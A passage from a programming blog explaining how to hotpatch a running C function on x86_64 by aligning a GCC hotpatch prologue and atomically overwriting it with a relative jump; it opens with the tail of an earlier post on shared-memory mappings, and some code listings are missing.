mappings. When called correctly it cannot fail, so there’s no return
value.
The shared object name includes the process ID and pointer array
address, so there really shouldn’t be any non-malicious name
collisions, even if called from multiple threads in the same process.
Otherwise it just walks the array setting up the mappings.
In this post I’m going to do a silly, but interesting, exercise that
should never be done in any program that actually matters. I’m going
write a program that changes one of its function definitions while
it’s actively running and using that function. Unlike last
time, this won’t involve shared libraries, but it will require
x86_64 and GCC. Most of the time it will work with Clang, too, but
it’s missing an important compiler option that makes it stable.
If you want to see it all up front, here’s the full source:
hotpatch.c
Here’s the function that I’m going to change:
voidhello(void){puts("hello");}
It’s dead simple, but that’s just for demonstration purposes. This
will work with any function of arbitrary complexity. The definition
will be changed to this:
I was only going change the string, but I figured I should make it a
little more interesting.
Here’s how it’s going to work: I’m going to overwrite the beginning of
the function with an unconditional jump that immediately moves control
to the new definition of the function. It’s vital that the function
prototype does not change, since that would be a far more complex
problem.
But first there’s some preparation to be done. The target needs to
be augmented with some GCC function attributes to prepare it for its
redefinition. As is, there are three possible problems that need to be
dealt with:
I want to hotpatch this function while it is being used by another
thread without any synchronization. It may even be executing the
function at the same time I clobber its first instructions with my
jump. If it’s in between these instructions, disaster will strike.
The solution is the ms_hook_prologue function attribute. This tells
GCC to put a hotpatch prologue on the function: a big, fat, 8-byte NOP
that I can safely clobber. This idea originated in Microsoft’s Win32
API, hence the “ms” in the name.
The prologue NOP needs to be updated atomically. I can’t let the
other thread see a half-written instruction or, again, disaster. On
x86 this means I have an alignment requirement. Since I’m
overwriting an 8-byte instruction, I’m specifically going to need
8-byte alignment to get an atomic write.
The solution is the aligned function attribute, ensuring the
hotpatch prologue is properly aligned.
The final problem is that there must be exactly one copy of this
function in the compiled program. It must never be inlined or
cloned, since these won’t be hotpatched.
As you might have guessed, this is primarily fixed with the noinline
function attribute. Since GCC may also clone the function and call
that instead, so it also needs the noclone attribute.
Even further, if GCC determines there are no side effects, it may
cache the return value and only ever call the function once. To
convince GCC that there’s a side effect, I added an empty inline
assembly string (__asm("")). Since puts() has a side effect
(output), this isn’t truly necessary for this particular example, but
I’m being thorough.
It’s 8-byte aligned and it has the 8-byte NOP: that lea instruction
does nothing. It copies rsp into itself and changes no flags. Why
not 8 1-byte NOPs? I need to replace exactly one instruction with
exactly one other instruction. I can’t have another thread in between
those NOPs.
Hotpatching
Next, let’s take a look at the function that will perform the
hotpatch. I’ve written a generic patching function for this purpose.
This part is entirely specific to x86.
It takes the address of the function to be patched and the address of
the function to replace it. As mentioned, the target must be 8-byte
aligned (enforced by the assert). It’s also important this function is
only called by one thread at a time, even on different targets. If
that was a concern, I’d wrap it in a mutex to create a critical
section.
There are a number of things going on here, so let’s go through them
one at a time:
Make the function writeable
The .text segment will not be writeable by default. This is for both
security and safety. Before I can hotpatch the function I need to make
the function writeable. To make the function writeable, I need to make
its page writable. To make its page writeable I need to call
mprotect(). If there was another thread monkeying with the page
attributes of this page at the same time (another thread calling
hotpatch()) I’d be in trouble.
It finds the page by rounding the target address down to the nearest
4096, the assumed page size (sorry hagepages). Warning: I’m being a
bad programmer and not checking the result of mprotect(). If it
fails, the program will crash and burn. It will always fail systems
with W^X enforcement, which will likely become the standard in the
future. Under W^X (“write XOR execute”), memory can either
be writeable or executable, but never both at the same time.
What if the function straddles pages? Well, I’m only patching the
first 8 bytes, which, thanks to alignment, will sit entirely inside
the page I just found. It’s not an issue.
At the end of the function, I mprotect() the page back to
non-writeable.
Create the instruction
I’m assuming the replacement function is within 2GB of the original in
virtual memory, so I’ll use a 32-bit relative jmp instruction. There’s
no 64-bit relative jump, and I only have 8 bytes to work within
anyway. Looking that up in the Intel manual, I see this:
Fortunately it’s a really simple instruction. It’s opcode 0xE9 and
it’s followed immediately by the 32-bit displacement. The instruction
is 5 bytes wide.
To compute the relative jump, I take the difference between the
functions, minus 5. Why the 5? The jump address is computed from the
position after the jump instruction and, as I said, it’s 5 bytes
wide.
I put 0xE9 in a byte array, followed by the little endian
displacement. The astute may notice that the displacement is signed
(it can go “up” or “down”) and I used an unsigned integer. That’s
because it will overflow nicely to the right value and make those
shifts clean.
Finally, the instruction byte array I just computed is written over
the hotpatch NOP as a single, atomic, 64-bit store.
*(uint64_t *)target = instruction.value;
Other threads will see either the NOP or the jump, nothing in between.
There’s no synchronization, so other threads may continue to execute
the NOP for a brief moment even through I’ve clobbered it, but that’s
fine.
I fire off the other thread to keep it pinging at hello(). In the
main thread, it waits until I hit enter to give the program input,
after which it calls hotpatch() and changes the function called by
the “worker” thread. I’ve now changed the behavior of the worker
thread without its knowledge. In a more practical situation, this
could be used to update parts of a running program without restarting
or even synchronizing.
Further Reading
These related articles have been shared with me since publishing this
article: